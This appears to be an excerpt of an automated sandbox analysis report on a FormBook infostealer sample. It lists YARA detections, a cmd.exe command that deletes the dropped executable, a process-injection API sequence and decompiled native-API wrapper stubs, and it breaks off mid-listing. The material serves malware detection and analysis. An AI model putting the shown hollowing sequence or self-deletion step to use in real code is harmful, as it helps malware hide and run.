                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                    General

                                                    Start time:20:43:05
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
                                                    Imagebase:0x4a110000
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Disassembly

                                                    Code Analysis

                                                      Executed Functions

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PS3n$PS3n
                                                      • API String ID: 0-726683640
                                                      • Opcode ID: 216ddfde7e5aa22e51e8bb184691af82e932870eda3546e75bd67231fbff3f10
                                                      • Instruction ID: f9e8dfdd8b63f638f0a6085fbe3e9ec84348b137a5626bf60193b9cbb238cf62
                                                      • Opcode Fuzzy Hash: 216ddfde7e5aa22e51e8bb184691af82e932870eda3546e75bd67231fbff3f10
                                                      • Instruction Fuzzy Hash: 22212FB8D16299CFCB50DFAAD8845FEBBB1BB49300F50806AD805B7310DB745A60CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CB8247
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 02eae3ee66b3ae3c01e193824bd2bd822a1fff4d77f88ee6e5b3c665581165b1
                                                      • Instruction ID: e01d32779475a4611ecbc2bd751139e8ee28592c0dd9985c864bd6214cbaa98f
                                                      • Opcode Fuzzy Hash: 02eae3ee66b3ae3c01e193824bd2bd822a1fff4d77f88ee6e5b3c665581165b1
                                                      • Instruction Fuzzy Hash: 2DC14570D00229CFDB20DFA4C845BEEBBB1BF49304F1095A9D919B7250DB749A89CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CB7BCB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 9b9b4aa590799becbf463c714986dba6c0e70ddcea66df18fc99ad7bbf30f948
                                                      • Instruction ID: 4d7fbb6afe48cd76d9411b46b48fcb55cbf9b51fd68e4e7bb58c6ffbeeafd753
                                                      • Opcode Fuzzy Hash: 9b9b4aa590799becbf463c714986dba6c0e70ddcea66df18fc99ad7bbf30f948
                                                      • Instruction Fuzzy Hash: 214199B4D052589FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D775AA45CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CB7D5A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: a3e49a65f886e89958fc7a365be65d7363b5d39893248b5ea71e4785c0bf830b
                                                      • Instruction ID: 7b97a98171631fc2a3856e9d29d44dea2a1ebcbbeb4e21e532b65c5a494c9ccb
                                                      • Opcode Fuzzy Hash: a3e49a65f886e89958fc7a365be65d7363b5d39893248b5ea71e4785c0bf830b
                                                      • Instruction Fuzzy Hash: BB41AAB8D042589FCF10CFA9D984AEEFBB1BF49314F20942AE814B7240D775A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CB7A2A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 0429cb6cd8dcccc18699575a1ed4ddc9e67857e2682e2a47060e0544dcb98ce0
                                                      • Instruction ID: 78abc2cfa2e0fa57990e4bcff1015c3beed63d3086dc67636eca1e1e557fd753
                                                      • Opcode Fuzzy Hash: 0429cb6cd8dcccc18699575a1ed4ddc9e67857e2682e2a47060e0544dcb98ce0
                                                      • Instruction Fuzzy Hash: C34199B8D042589FCF10CFA9D984ADEFBB1BF49314F20A42AE815B7200D735A915CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00CB77BF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 196e20a332c5b48cff4be0b3d442752e9690f48522f9e54d5116c6ba38ca54d3
                                                      • Instruction ID: 5885792633753ae5a35212dcf64c859dfe636deebe2b028726b7e484d010fb7f
                                                      • Opcode Fuzzy Hash: 196e20a332c5b48cff4be0b3d442752e9690f48522f9e54d5116c6ba38ca54d3
                                                      • Instruction Fuzzy Hash: 9641CEB4D002589FCB10CFA9D984AEEFBF1BF49314F24842AE814B7240D779A945CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 00CB764E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 6b9aade74fd4e1fbdef68f3d876fa8ff6acd930c4fd0c2a422e6c08c2c07f5a5
                                                      • Instruction ID: a1957d9a43557235b7374267143e4bc2f53fe542f53a0dcb0eb9a596b8e55aeb
                                                      • Opcode Fuzzy Hash: 6b9aade74fd4e1fbdef68f3d876fa8ff6acd930c4fd0c2a422e6c08c2c07f5a5
                                                      • Instruction Fuzzy Hash: CB31BCB4D052189FCF14CFA9D984ADEFBB1AF49314F20942AE814B7300D735A901CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fCPl
                                                      • API String ID: 0-3010081917
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62728caef32b2e9e1c2f066b54126371c364bd1244c2c4e0f3532244de6efcf9
                                                      • Instruction ID: bf1f743264c366d9d1876e676029cb2bd54de350f3ac767c889ce81aafdccf63
                                                      • Opcode Fuzzy Hash: 62728caef32b2e9e1c2f066b54126371c364bd1244c2c4e0f3532244de6efcf9
                                                      • Instruction Fuzzy Hash: 42F09274921219CFCB65DF24E9987D8BBB5FB68305F0085EAD58AA7290DBB01EC0CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90b9c54deabbc879fbd8c3a561c5c5415320448e02a97b103b0192ada3eac92d
                                                      • Instruction ID: 9b87e0a8550c337b3aa1ac8f8892e9f813eafe8ed11fea6daecfddcf1b9d9882
                                                      • Opcode Fuzzy Hash: 90b9c54deabbc879fbd8c3a561c5c5415320448e02a97b103b0192ada3eac92d
                                                      • Instruction Fuzzy Hash: 93E0EC34995248DFCB40DFB8E8496ADBBB4AB09306F6011AAC809E3350E7305AA4DB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34390d223dd2d122332e989229a89239e33ca58672b15f2887460a1549ac604b
                                                      • Instruction ID: ed1a21d07cbead2f3f5efacb1271c95a93f4291d7412212f72a821424ccef0c1
                                                      • Opcode Fuzzy Hash: 34390d223dd2d122332e989229a89239e33ca58672b15f2887460a1549ac604b
                                                      • Instruction Fuzzy Hash: 3CE0EC70955248EFCB40EFB898456ADBBB8AB05305F5001A98949A3358E7305A54CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1abb211db9b13e2b8c365b0df91e3f1d3f4f3610428c8b3b5c739627b20521b
                                                      • Instruction ID: 900a5bfffa60b5d5bda38e15e1aa7a8c310b1f58b8506d44be3baed73e24b3d8
                                                      • Opcode Fuzzy Hash: d1abb211db9b13e2b8c365b0df91e3f1d3f4f3610428c8b3b5c739627b20521b
                                                      • Instruction Fuzzy Hash: F4E0EC34D56248DFCB41DFB8E8496ACBBB8EB49305F5441A9C909A3350EB305A60CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b98b91d6f08395f9a849cbd08bd19eaa1497219eccedfdfa9877d91c2b22ee8
                                                      • Instruction ID: e10d8b091bbb5b5082c42f444ff2f2b8ce5e283fe044614159affafb828c6eb4
                                                      • Opcode Fuzzy Hash: 4b98b91d6f08395f9a849cbd08bd19eaa1497219eccedfdfa9877d91c2b22ee8
                                                      • Instruction Fuzzy Hash: B9D0A9704AA1489BC710CBAA9800AAAB22CE78B208F8010B8C90A23B40DB300AA0C284
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .@Pl$|g=
                                                      • API String ID: 0-2650165475
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      C-Code - Quality: 16%
                                                      			E0041A3A3(void* __esi, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
                                                      
                                                      				asm("cli");
                                                      				asm("wait");
                                                      				asm("wait");
                                                      				cs =  *((intOrPtr*)(__esi - 0x5d5a360d));
                                                      				asm("in eax, dx");
                                                      				if (__eflags >= 0) goto L3;
                                                      			}



                                                      APIs
                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: IA$!JA$bMA$bMA
                                                      • API String ID: 2738559852-3023253649
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                      				intOrPtr _t13;
                                                      				void* _t18;
                                                      				void* _t27;
                                                      				void* _t28;
                                                      				intOrPtr* _t29;
                                                      
                                                      				_t13 = _a4;
                                                      				_t29 = _t13 + 0xc48;
                                                      				E0041AF50(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                      				_t4 =  &_a40; // 0x414a21
                                                      				_t6 =  &_a32; // 0x414d62
                                                      				_t12 =  &_a8; // 0x414d62
                                                      				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t28); // executed
                                                      				return _t18;
                                                      			}








                                                      APIs
                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !JA$bMA$bMA
                                                      • API String ID: 2738559852-4222312340
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0041A34A(void* __ecx, signed int __edx, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                                                      				long _t23;
                                                      
                                                      				_pop(_t40);
                                                      				 *(__ecx + 0x17) =  *(__ecx + 0x17) ^ __edx;
                                                      				_t17 = _a8;
                                                      				_t5 = _t17 + 0xc40; // 0xc40
                                                      				E0041AF50(0xec8b5588, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
                                                      				_t23 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                      				return _t23;
                                                      			}




                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                      				long _t21;
                                                      				void* _t31;
                                                      
                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                      				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                      				return _t21;
                                                      			}





                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A52B(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                      				long _t15;
                                                      
                                                      				_t11 = _a4;
                                                      				_t4 = _t11 + 0xc60; // 0xca0
                                                      				E0041AF50(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                      				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                      				return _t15;
                                                      			}




                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                      				long _t14;
                                                      				void* _t21;
                                                      
                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                      				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                      				return _t14;
                                                      			}





                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0041A47A(void* __eax, intOrPtr _a4, void* _a8) {
                                                      				long _t10;
                                                      				void* _t13;
                                                      
                                                      				asm("out 0x36, al");
                                                      				_t7 = _a4;
                                                      				_t2 = _t7 + 0x10; // 0x300
                                                      				_t3 = _t7 + 0xc50; // 0x40a933
                                                      				E0041AF50(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                                                      				_t10 = NtClose(_a8); // executed
                                                      				return _t10;
                                                      			}






                                                      APIs
                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 43063bb49def2e9c8776e343cad7f0fa0d7d5bf092cadcbe0947896f37d2437a
                                                      • Instruction ID: 1cac5fc2f44f68a02cf9d8ecf26e47b333177b788bcd937ba9b313b829f897f9
                                                      • Opcode Fuzzy Hash: 43063bb49def2e9c8776e343cad7f0fa0d7d5bf092cadcbe0947896f37d2437a
                                                      • Instruction Fuzzy Hash: 8FE012752002147BD714EFE8CC85FD77B68EF48764F15459DBA1DAB246C570E6108BD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A480(intOrPtr _a4, void* _a8) {
                                                      				long _t8;
                                                      				void* _t11;
                                                      
                                                      				_t5 = _a4;
                                                      				_t2 = _t5 + 0x10; // 0x300
                                                      				_t3 = _t5 + 0xc50; // 0x40a933
                                                      				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                      				_t8 = NtClose(_a8); // executed
                                                      				return _t8;
                                                      			}






                                                      APIs
                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
